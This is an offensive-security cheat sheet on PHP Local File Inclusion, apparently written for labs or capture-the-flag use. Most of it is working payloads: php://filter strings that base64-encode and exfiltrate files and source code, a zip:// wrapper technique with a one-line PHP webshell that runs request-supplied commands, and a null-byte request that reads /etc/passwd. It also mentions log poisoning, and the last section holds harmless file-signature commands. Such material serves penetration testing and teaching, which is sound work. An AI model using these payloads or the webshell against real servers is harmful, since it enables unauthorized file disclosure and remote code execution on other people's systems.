LFI

Local File Inclusion

PHP Filters & Wrappers

Filter Inclusion

Exfiltrate files

php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>

Exfiltrate the source code

php://filter/convert.base64-encode/resource=dashboard

Remote Code Execution

The zip:// stream wrapper can be used in specific attack scenarios to potentially execute malicious code.

• First, create the webshell:

echo '<?php system($_REQUEST['cmd']); ?>' > cmd.php

• Second, zip the file:

zip shell.zip cmd.php

• Important to mention that the file extension can be different from .zip, the wrapper will still execute the code inside.

• Third, upload the file and once is done, use the wrapper:

zip://uploads/PATH/TO/FILE%23cmd&cmd=id

• Have in mind that %23 is the URL encoded version of # and is used to reference a file inside the zip

The %00 Null Terminator

Is often used to terminate a string prematurely, effectively allowing attackers to manipulate the filename or file extension.

http://10.10.10.80/index.php?op=/etc/passwd%00

Chaining

• If it's possible to access logs try Log Poisoning

File Signatures

• List of file signatures

Reads the first 16 bytes of a file and displays them in a hexadecimal format with ASCII representation:

file myfile && head -c 16 myfile | xxd

Converts the entire file into plain hex and extracts the first line:

xxd -p filename | head -n 1